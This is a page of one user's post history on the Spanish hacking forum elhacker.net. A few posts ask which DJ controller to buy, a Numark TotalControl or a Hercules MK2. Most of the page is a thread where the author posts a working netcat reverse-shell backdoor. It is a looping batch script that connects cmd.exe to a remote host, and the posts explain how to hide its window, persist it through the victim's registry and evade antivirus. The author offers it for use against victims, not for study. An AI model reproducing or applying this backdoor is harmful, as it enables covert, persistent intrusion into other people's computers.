elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Media / Multimedia / Re: Numark TotalControl o Hercules MK2?????? en: 10 Octubre 2007, 13:46 pm
Bueno Man-in-the-middle veo que tu no dudas.



Realmente se ve mucho mas completa y buena la numark.

Pero lo único que me hace dudar son las conexiones frontales y posteriores. La numark no tiene nada, solo puerto USB para conectar al ordenador, a diferencia de la mk2 que tiene detodo:





Como podria remplazar todas las conexiones de la mk2? con una tarjeta de sonido buena? (para conectar jack grandes, amplis etz) o me vale mas la pena la mk2 ?¿?¿¿
12  Media / Multimedia / Re: Numark TotalControl o Hercules MK2?????? en: 9 Octubre 2007, 23:06 pm
jaj pues vaya aun me aveis dejado mas liado.

Haber, en principio voy a utilizar la mesa en el pc, donde tengo dos targetas de sonido ya para el vdj (aun y que son una m***** pero suenan). Claro que lo guapo de estas consolas es que las puedes transportar facilmente y con un portatil mezclar pero bueno...

Supongo que todo lo que pueda hacer en la MK2 lo podre hacer en la numark y mucho mas.

Dicho esto que me recomiendan?
13  Media / Multimedia / Numark TotalControl o Hercules MK2?????? en: 9 Octubre 2007, 18:24 pm
Bueno pues estaba decidido a comprarme la hercules mk2 pero he visto en la web de virtual dj la numark TotalControl que esta muy wapa esteticamente y vale igual que la hercules.

Cual me recomiendan? Cual tiene mas funciones?


gracias
14  Seguridad Informática / Hacking / Re: Backdoor reverse shell con netcat en: 2 Enero 2007, 22:16 pm
Yo lo utilizo como backdoor tras la penetracion, ya me encargo de que el antivirus no lo detecte. Aun asi no creas que muchos antivirus lo detecten.. con mas de uno no ha echo falta ni desactivarlo.
15  Seguridad Informática / Hacking / Re: Backdoor reverse shell con netcat en: 2 Enero 2007, 12:32 pm
Prueva de ponerlo en otra carpeta que no sea system32, si te funciona seguramente seran los permisos. Mira las cuentas que tienes y asegurate que eres admin.

Si no te funciona asegurate de no tener ningun tipo de programa antivirus. Haz un net start y mira que no tengas ningun antivirus o programa parecido, y mira los procesos.

Citar
no tengo antivirus

Si no es nada de esto pillate un antivirus y haz un repasso a tu disco.

Saludos
16  Seguridad Informática / Hacking / Re: Backdoor reverse shell con netcat en: 2 Enero 2007, 01:23 am
Primero gracias por postear

Citar
bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error

Esto es un backdoor, supuestamente hemos obtenido el control del sistema (o no...) y queremos dejar una puerta trasera. Nc lo mejor es meterlo en system32 si no:

Código:
@echo off
:svr
c:\ruta\nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Saludos
17  Seguridad Informática / Hacking / Backdoor reverse shell con netcat en: 1 Enero 2007, 23:04 pm
Bueno posteo mi forma de dejar un backdoor reverse shell:

Creo el siguiente bat:

Código:
@echo off
:svr
nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito.
(Podemos quitar la linea del ping para que intente la conexion infinitamente).

El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro.
Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo.

Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual.
18  Seguridad Informática / Hacking / Re: NO-IP VICTIM CREATOR 1.0 !!!! Olvidandonos de las IPs dinamicas en: 15 Marzo 2006, 07:11 am
Para añadir al registro las claves del duc deve ir cifrada, si no el programa no se habre, crea error.
19  Seguridad Informática / Hacking / Re: NO-IP VICTIM CREATOR 1.0 !!!! Olvidandonos de las IPs dinamicas en: 14 Marzo 2006, 22:36 pm
Gracias  ;)
20  Seguridad Informática / Hacking / Re: NO-IP VICTIM CREATOR 1.0 !!!! Olvidandonos de las IPs dinamicas en: 14 Marzo 2006, 17:28 pm
jaja en la version 1.2 coregire  ;)
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines